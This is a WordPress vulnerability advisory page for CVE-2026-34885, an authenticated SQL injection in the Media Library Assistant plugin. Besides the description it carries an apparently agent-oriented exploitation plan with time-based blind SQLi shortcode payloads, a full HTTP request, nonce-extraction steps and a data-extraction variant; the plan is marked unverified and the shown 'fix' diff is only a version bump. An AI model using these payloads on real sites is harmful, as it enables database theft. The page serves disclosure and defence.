WP-Safety
CVE-2026-34885

Media Library Assistant <= 3.34 - Authenticated (Contributor+) SQL Injection

mediumImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
6.5
CVSS Score
6.5
CVSS Score
medium
Severity
3.35
Patched in
8d
Time to patch

Description

The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.34 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=3.34
PublishedApril 6, 2026
Last updatedApril 13, 2026
Affected pluginmedia-library-assistant

What Changed in the Fix

Changes introduced in v3.35

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v3.34
Browse source Download .zip
Patched v3.35
Browse source Download .zip
Research Plan
Unverified

This vulnerability is a classic **Authenticated SQL Injection** occurring within the **Media Library Assistant (MLA)** plugin. The flaw resides in how the plugin handles specific shortcode attributes or AJAX parameters that influence the construction of SQL queries. Specifically, parameters defining…

Show full research plan

This vulnerability is a classic Authenticated SQL Injection occurring within the Media Library Assistant (MLA) plugin. The flaw resides in how the plugin handles specific shortcode attributes or AJAX parameters that influence the construction of SQL queries. Specifically, parameters defining ORDER BY or WHERE clauses are concatenated into SQL queries without being passed through $wpdb->prepare() or being properly sanitized for SQL identifiers.

Authenticated attackers with Contributor-level permissions can exploit this by injecting SQL commands through shortcode attributes in posts they create. When these posts are rendered, the injected SQL is executed by the server.

1. Vulnerability Summary

  • Vulnerability: SQL Injection via unsanitized shortcode attributes or AJAX parameters.
  • Affected Version: <= 3.34.
  • Vulnerable Component: MLAArchiveList (shortcode handler) and potentially the MLAQuery engine.
  • Reason: The plugin dynamically builds SQL queries by concatenating user-supplied attributes (like mla_item_orderby) into $wpdb methods without using the WordPress Database abstraction layer's preparation features correctly.

2. Attack Vector Analysis

  • Endpoint: Any frontend page or post where shortcodes are processed, or the admin-ajax.php endpoint.
  • Attack Surface: Shortcode attributes in [mla_archive_list] (introduced in 3.31) or [mla_gallery].
  • Required Role: Contributor or higher.
  • Payload Carrier: The mla_item_orderby or mla_item_where attribute within the shortcode.

3. Code Flow

  1. Entry Point: MLACore registers shortcodes (like [mla_archive_list]).
  2. Shortcode Handling: A user with edit_posts (Contributor) creates a post containing:
    [mla_archive_list mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A)"]
  3. Processing: MLAArchiveList (defined in includes/class-mla-shortcode-archive-list.php) parses these attributes.
  4. Query Construction: The attributes are passed to internal query functions (likely in MLAQuery, referenced in MLAData::initialize).
  5. SQL Sink: The unsanitized mla_item_orderby string is concatenated into an ORDER BY clause and executed via $wpdb->get_results().

4. Nonce Acquisition Strategy (If required for AJAX)

While the shortcode vector does not require a nonce, MLA AJAX actions like terms_search (defined by MLACore::MLA_ADMIN_TERMS_SEARCH) often do.

If the agent needs to exploit an AJAX action:

  1. Create a Page: MLA enqueues its media modal scripts when the media library or certain shortcodes are present.
    wp post create --post_type=page --post_status=publish --post_title="MLA Test" --post_content='[mla_gallery]'
  2. Navigate and Extract: Use browser_navigate to the new page.
  3. Extract Nonce: The nonce is stored in the mla_media_modal_vars object (defined in MLAModal::JAVASCRIPT_MEDIA_MODAL_OBJECT).
    // Use browser_eval
window.mla_media_modal_vars?.mla_admin_nonce
  4. Verification: The action name associated with this nonce is mla_admin_nonce_action (from MLACore::MLA_ADMIN_NONCE_ACTION).

5. Exploitation Strategy (Shortcode Vector)

This is the most reliable path for a Contributor-level attacker.

  • Step 1: Authenticate as a Contributor.
  • Step 2: Create a Post with a time-based blind SQLi payload.
    • Action: Create post.
    • Content: [mla_archive_list mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A)"]
  • Step 3: Trigger Execution by viewing the post.
  • Step 4: Analyze Timing. A successful injection will cause a ~5-second delay in the response.

HTTP Request Details:

POST /wp-admin/post.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=editpost&post_ID=[POST_ID]&post_title=Exploit&content=[mla_archive_list+mla_item_orderby="ID,+(SELECT+1+FROM+(SELECT+SLEEP(5))A)"]&_wpnonce=[NONCE]&publish=Publish

6. Test Data Setup

  1. User: Create a Contributor user: wp user create attacker attacker@example.com --role=contributor --user_pass=password.
  2. Plugin State: Ensure MLA is active and Media Modal support is enabled (default).
    wp plugin activate media-library-assistant
  3. Media Items: Ensure at least one attachment exists in the library so the archive query has rows to process.
    wp media import https://wordpress.org/latest.zip --title="Test Item"

7. Expected Results

  • Unperturbed Request: A request to a page with [mla_archive_list] should return in < 500ms.
  • Exploited Request: A request to the same page with the malicious mla_item_orderby attribute should return in > 5000ms.
  • Error Logging: If WP_DEBUG is on, the MySQL error might show a syntax error if the injection is incorrectly terminated, confirming the input reached the query.

8. Verification Steps

After triggering the delay, use wp-cli to prove data extraction (e.g., extracting the database version):

  1. Modify the shortcode to use a conditional sleep based on the first character of the version:
    [mla_archive_list mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A WHERE VERSION() LIKE '8%')"]
  2. Verify the delay happens only when the condition is true.

9. Alternative Approaches

If mla_item_orderby is patched but mla_item_where is not:

  • Payload: [mla_archive_list mla_item_where="1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))A)"]

If shortcodes are disabled for Contributors:

  • AJAX Vector: Use the mla_admin_action=terms_search action.
    • URL: /wp-admin/admin-ajax.php
    • Parameters: action=mla-media-modal-scripts&mla_admin_action=terms_search&taxonomy=post_tag&search_string=test&mla_admin_nonce=[NONCE]
    • Injection Point: Inject into the taxonomy parameter if it's used to build the query dynamically.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Media Library Assistant plugin for WordPress is vulnerable to an authenticated SQL injection via shortcode attributes (such as mla_item_orderby or mla_item_where) in versions up to 3.34. Attackers with Contributor-level access or higher can exploit this by inserting malicious SQL clauses into shortcodes within posts, which are then concatenated into database queries without proper sanitization or preparation.

Vulnerable Code

// includes/class-mla-shortcode-archive-list.php line 17
class MLAArchiveList {
	/**
	 * These are the default parameters for archive list display
	 *
	 * @since 3.31
	 *
	 * @var	array
	 */
	private static $item_specific_arguments = array(
		'itemtag_id' => '',
		'itemtag_class' => 'archive-list-item',
		'itemtag_attributes' => '',
		'itemtag_value' => '',
		'itemtag_label' => '',

---

// includes/class-mla-data.php line 27
class MLAData {
	/**
	 * Initialization function, similar to __construct()
	 *
	 * @since 0.1
	 */
	public static function initialize() {
		// Moved to MLAQuery but retained here for example plugins.
		self::$search_parameters =& MLAQuery::$search_parameters;
		self::$query_parameters =& MLAQuery::$query_parameters;

		add_action( 'save_post', 'MLAData::mla_save_post_action', 10, 1);
		add_action( 'edit_attachment', 'MLAData::mla_save_post_action', 10, 1);
		add_action( 'add_attachment', 'MLAData::mla_save_post_action', 10, 1);
	}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.34/includes/class-mla-core.php /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.35/includes/class-mla-core.php
--- /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.34/includes/class-mla-core.php	2026-03-07 00:56:28.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.35/includes/class-mla-core.php	2026-03-30 00:02:10.000000000 +0000
@@ -21,7 +21,7 @@
 	 *
 	 * @var	string
 	 */
-	const CURRENT_MLA_VERSION = '3.34';
+	const CURRENT_MLA_VERSION = '3.35';

Exploit Outline

The vulnerability can be exploited by an authenticated user with at least Contributor-level permissions. The attacker creates or edits a post and inserts a shortcode such as `[mla_archive_list]` or `[mla_gallery]`. Within the shortcode, the attacker provides a malicious SQL payload via attributes that influence the SQL query structure, specifically `mla_item_orderby` or `mla_item_where`. For example, using a payload like `mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A)"` will cause the database to pause for 5 seconds when the post is viewed or previewed. Because these attributes are concatenated directly into the SQL statement without being processed by `$wpdb->prepare()`, the attacker can perform time-based blind SQL injection to extract sensitive information from the WordPress database.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/2bb47ffd-1375-444c-8c55-05b59cb03f63?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database